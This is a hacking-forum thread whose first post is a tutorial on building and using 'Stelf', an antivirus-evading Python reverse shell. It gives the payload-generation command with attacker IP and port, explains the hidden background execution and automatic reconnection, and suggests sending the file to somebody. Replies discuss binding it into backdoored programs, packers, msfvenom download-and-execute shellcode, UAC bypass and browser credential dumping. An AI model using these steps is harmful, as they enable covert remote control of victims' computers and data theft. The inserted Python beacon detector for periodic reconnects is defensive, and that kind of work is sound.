How to get a Super Stelfy Shell (that AV doesn't pick up)

malware
reverseshell
stelf

(Security Architect & Founder) #1

Getting Stealthy with Stelf

Hello 0x00’ers!

In this tutorial, I am going to be giving away some content that has been sought after for a long time. Everybody knows that most prebuilt tools such as Metasploit don’t work, nor do the payloads generated by them or the encoders used with them. They get picked up by anti-virus, they get stuck in filters; using them generally will give you a bad time no matter how many awkward tutorials you follow.

This is not because they are badly written; no, they are very good tools. The problem, though, lies in the fact that they are very popular. Anti-virus packages work on blacklists, and when thousands of newbie hackers are generating payloads en masse, they soon get added to these blacklists, making all that hard work moot.

I am going to show you how to use literally one of the easiest tools written by @Joe_Schmoe.

Downloading Stelf

Go over to the gitlab and get a copy.

Once that’s downloaded, unzip the file and you’re ready for the next step.

Generating your Stelf Payload

python2 encode.py yourip theport outputfilename.exe

Replace these values with the ones you will need. In my case it looks like this:

python2 encode.py 192.168.1.89 8080 scaryfile.exe

It will also ask you if you want to start a webserver for better sharing purposes. You can enter “y” and hit enter to do this.

Once you’ve transferred your executable wherever you may need it, start the handler and you’ll be ready to go.

Using Stelf

Fire up the handler with python2 handler.py and then just open the file.

In my case I had a shell open up before from persistence on this machine. I’ve been testing stelf on this VM before.

There’s no point me posting an image of the windows machine because nothing happens, you just click it and nothing appears to happen (it opens in the background). This behavior is nice as it will work with backdoored programs really nicely. You’ll never know it was there.

The shell will attempt a reconnection every 10 seconds and doesn’t require any other code. It is completely self-contained. Theoretically, you could send this to somebody, never open your handler, and, providing they don’t shut down their computer to kill the process, you can open your handler any time and get a shell.

In the future, it may be possible to make it run persistence when it is first opened.

Quick Stelf Commands

  • l - List sessions
  • i - Interact with sessions
  • ctrl+c - Background session

Once inside a session the ‘help’ command will show you the way. Also, remember this is a normal shell too, so typing any Windows cmd command will work.

I hope this helps you out, also I hope you guys realise how powerful Stelf is. Especially since it doesn’t get picked up by any AV without even needing an encoder (encoders look fishy).

@Joe_schmoe has poured his heart and soul into this, and to just finally show it off to the world is really rewarding.

That’s all for today, guys!

- pry0cc
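The post notes that the shell retries its outbound connection every 10 seconds while the handler is down. From the defended host's side, that is a stream of evenly spaced connection attempts to one address and port, which is exactly the regularity a beaconing detector looks for. The following is an added example for that detection, not code from the thread or from the Stelf tool: it parses a few constructed log lines in an assumed "timestamp src -> dst:port action" format (not any real product's format), groups attempts per flow, and flags flows whose inter-attempt gaps are nearly constant. The thresholds (`min_attempts`, `max_cv`) are assumptions chosen for the sample, not tuned values.

```python
"""Periodic-reconnect (beacon) detector over constructed connection-log lines.

Added example, not part of the original thread or the Stelf project. The log
format, the sample lines, and the thresholds below are all constructed for
illustration.
"""
from __future__ import annotations

import re
import statistics
from collections import defaultdict
from datetime import datetime, timezone

# Assumed log line shape (constructed for this example):
# 2017-03-01T10:00:00Z 10.0.0.5 -> 192.0.2.10:8080 SYN
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>[\d.]+)\s+->\s+(?P<dst>[\d.]+):(?P<port>\d+)\s+(?P<action>\w+)$"
)

# Constructed sample: one flow retrying every 10 s exactly, one retrying with
# small jitter, one irregular "browsing" flow, and one malformed line.
SAMPLE_LOG = """\
2017-03-01T10:00:00Z 10.0.0.5 -> 192.0.2.10:8080 SYN
2017-03-01T10:00:00Z 10.0.0.5 -> 203.0.113.9:4444 SYN
2017-03-01T10:00:05Z 10.0.0.5 -> 198.51.100.7:443 SYN
2017-03-01T10:00:07Z 10.0.0.5 -> 198.51.100.7:443 SYN
2017-03-01T10:00:09Z 10.0.0.5 -> 203.0.113.9:4444 SYN
2017-03-01T10:00:10Z 10.0.0.5 -> 192.0.2.10:8080 SYN
this line is not in the expected format
2017-03-01T10:00:20Z 10.0.0.5 -> 192.0.2.10:8080 SYN
2017-03-01T10:00:21Z 10.0.0.5 -> 203.0.113.9:4444 SYN
2017-03-01T10:00:30Z 10.0.0.5 -> 192.0.2.10:8080 SYN
2017-03-01T10:00:30Z 10.0.0.5 -> 203.0.113.9:4444 SYN
2017-03-01T10:00:35Z 10.0.0.5 -> 198.51.100.7:443 SYN
2017-03-01T10:00:36Z 10.0.0.5 -> 198.51.100.7:443 SYN
2017-03-01T10:00:40Z 10.0.0.5 -> 192.0.2.10:8080 SYN
2017-03-01T10:00:41Z 10.0.0.5 -> 203.0.113.9:4444 SYN
2017-03-01T10:00:50Z 10.0.0.5 -> 192.0.2.10:8080 SYN
2017-03-01T10:01:40Z 10.0.0.5 -> 198.51.100.7:443 SYN
"""


def parse_log(text: str) -> list[tuple[datetime, str, str, int]]:
    """Parse log lines into (timestamp, src, dst, port); malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # unknown line shape: ignore it rather than crash the detector
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append((ts, m["src"], m["dst"], int(m["port"])))
    return events


def find_beacons(events, min_attempts: int = 5, max_cv: float = 0.25):
    """Return (flow, attempts, mean_gap_s, cv) for flows with near-constant gaps.

    cv is the coefficient of variation (stdev / mean) of the gaps between
    consecutive attempts; a low cv means the attempts are evenly spaced.
    """
    by_flow: dict[tuple[str, str, int], list[datetime]] = defaultdict(list)
    for ts, src, dst, port in events:
        by_flow[(src, dst, port)].append(ts)

    hits = []
    for flow, stamps in by_flow.items():
        if len(stamps) < min_attempts:
            continue  # too few attempts to say anything about periodicity
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.fmean(gaps)
        if mean <= 0:
            continue  # all attempts share one timestamp: not a retry loop
        cv = statistics.stdev(gaps) / mean
        if cv <= max_cv:
            hits.append((flow, len(stamps), round(mean, 1), round(cv, 3)))
    return sorted(hits, key=lambda h: h[3])


if __name__ == "__main__":
    for flow, n, mean_gap, cv in find_beacons(parse_log(SAMPLE_LOG)):
        src, dst, port = flow
        print(f"{src} -> {dst}:{port}: {n} attempts, ~{mean_gap}s apart (cv={cv})")
```

On the sample, the two retry loops are reported (the exact one with cv 0.0, the jittered one with cv about 0.15) while the irregular 443 flow is not. In practice the same grouping works over firewall or flow-export records; a flow that keeps attempting a connection to a non-listening port on a fixed cadence, with no matching established session, is worth a look regardless of what the executable that produced it looks like on disk.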


(Community & PR manager) #2

i3 config files plz?

On-topic: thanks for the tutorial, I got a little confused by STELF at first (but I figured it out fast enough), hopefully this tutorial will clear out confusion for other people too :wink:

-Phoenix750


#3

?

100k1n9 4 r3fUd


(Security Architect & Founder) #4

I was playing with the backdoor factory. Apparently that gets picked up.


#5

If you need some help with that, you know who to talk to. :beers:

Also, cool little framework.


(Security Architect & Founder) #6

Since my host is Linux, I wanted to figure out a way to make a cross platform backdoor. I have already used your packer + your file binder. But I’ve needed my VM for that. Also, I’m having a bit of an issue with resource hacker. Get on IRC.


#7

Don’t bother using my public packer, it’s already detected like crazy.


(Security Architect & Founder) #8

So people have been jamming it in virustotal? The audience was extremely small. I am surprised as to how it’s gotten out.


#9

Don’t backdoor with the whole executable ya silly goose, use msfvenom to create download and execute shellcode (or make your own, wink wink)


(Security Architect & Founder) #10

Did you ever finish the stager functionality? I’d be interested to see that. You’ve completely left this project stagnant for ages!!! Smh

:joy: Just kidding Joe.


#11

There’s no reason to write any sort of staging code honestly, any old http server and shellcode will do


#12

Potentially dumb question, but what is the advantage of using this over Veil? If it does use some different obfuscation method, a breakdown of that would be interesting.


(Security Architect & Founder) #13

  1. Veil doesn’t work anymore. I’m not sure if you’ve had success with it, but all my experiences have been flawed.
  2. This isn’t obfuscation, this is a fresh shell, brand new (and it’s in Python!), which means it’s cross-platform.

#14

Ok, cool. Thought it worth asking before digging in too deep. Second the issues with Veil. I have had success with Veil on production networks, but those returns have diminished considerably. Thanks!


#15

AWESOME WORK GUIZ!!!

Mucho kudos!


(Infamous Industries) #16

The super stelfy shell is a good idea. Is this a community project???

if so we have some suggestions.

  1. Keep the shell basic - cd/isadmin/bypassuac/download/upload/persist/help etc… Just keep the basics
  2. Put dumpchrome, ff and others in their own individual files; it makes your job easier.
  3. Encryption???
  4. Keep up the great work. We are still programming newbs and learning heaps from the community.

(mark allen) #17

Hi phoenix750, I am also a bit confused about STELF. Please, how did you figure it out? Thanks


(mark allen) #18

Hi bro, I am a bit confused about the STELF. Please, can you give me a hand? Thanks


(Security Architect & Founder) #19

Well thanks to @Joe_Schmoe and his rapid refactoring skills. He is re-writing the entire shell. With cool stuff like modules and that. So in fact the gitlab link doesn’t actually work; neither do the instructions here anymore.

We’ll make an article when the new version gets released. And it works :stuck_out_tongue:


(mark allen) #20

Ok thanks bro, I will be waiting for it.